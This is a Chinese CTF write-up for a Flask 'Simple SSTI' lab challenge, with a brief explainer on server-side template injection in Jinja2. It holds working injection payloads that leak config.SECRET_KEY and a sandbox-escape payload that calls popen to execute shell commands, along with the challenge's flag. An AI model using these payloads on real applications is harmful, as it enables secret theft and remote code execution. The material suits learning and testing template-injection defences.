赞
踩
没啥好说的~
You need pass in a parameter named flag。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Simple SSTI</title>
</head>
<body>
You need pass in a parameter named flag。
<!-- You know, in the flask, We often set a secret_key variable.-->
</body>
</html>
发现最后有一行注释:
<!-- You know, in the flask, We often set a secret_key variable.-->
翻译一下就是说:在flask中,设置了一个secret_key变量。
所以就是需要我们来访问这个变量了,接下来的问题就是如何访问这个变量,也就是说要了解一下于flask中访问变量。请看后续【新知识点】部分
略
知道了如何使用falsk的变量,那就可以进行尝试传参了
http://114.67.175.224:17329/?flag={{1}}
可以正常显示传入的数据。
2. 传入可能得文件
http://114.67.175.224:17329/?flag={{6*6}}
http://114.67.175.224:17329/?flag={{flag.html}}
发现出现了一些提示信息:flag未定义
那就再看看提示信息中的secret_key变量,搜索一下这个变量一般存储在哪里:单独配置文件中或者直接写入脚本中:
那就可以直接测试config.SECRET_KEY,配置文件中的SECRET_KEY变量:
http://114.67.175.224:17329/?flag={{config.SECRET_KEY}}
当然,也可以直接访问config:
http://114.67.175.224:17329/?flag={{config}}
更高级的更深入:
?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}
解释如下:
这部分首先尝试访问当前对象的全局符号表(字典),然后试图在其中查找Popen键,并执行其对应的值(一个命令)。这个命令是``echo flag`,也就是打印flag的意思。最后以read()方法读取输出。
ps:这段代码的核心思想是通过复杂的对象模型和全局符号表来执行一个命令并读取其输出
flag{c4ea2f7e11ad8ed2222677bcd59d0303}
SSTI即服务器端模板注入(Server-Side Template Injection),是一种注入漏洞。
服务端接收了用户的恶意输入以后,未经任何处理就将其作为Web应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell等问题。
常见的SSTI模块注入攻击包括以下几种:
flask 是python HTML模版引擎,Flask只是一个内核
在Flask web程序中,通过业务逻辑函数得到的数据后,接下来需要根据这些数据生成HTTP响应(对于Web应用来说,HTTP响应是一个HTML文件)。在Flask Web开发中,一般是提供一个HTML模板文件,然后将数据传递到模板中,在渲染HTML模板文件后会得到最终的HTML响应文件。
在Flask框架中,默认依赖于两个外部库: Jinja2 模板引擎和 Werkzeug WSGI 工具集,其他很多功能都是以扩展的形式进行嵌入使用。
在 Jinja2 模板引擎中,表示变量的语法是:
{{nme}}
在模板中,想要展示视图向模板渲染的变量,需要使用{{变量}}进行接收。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。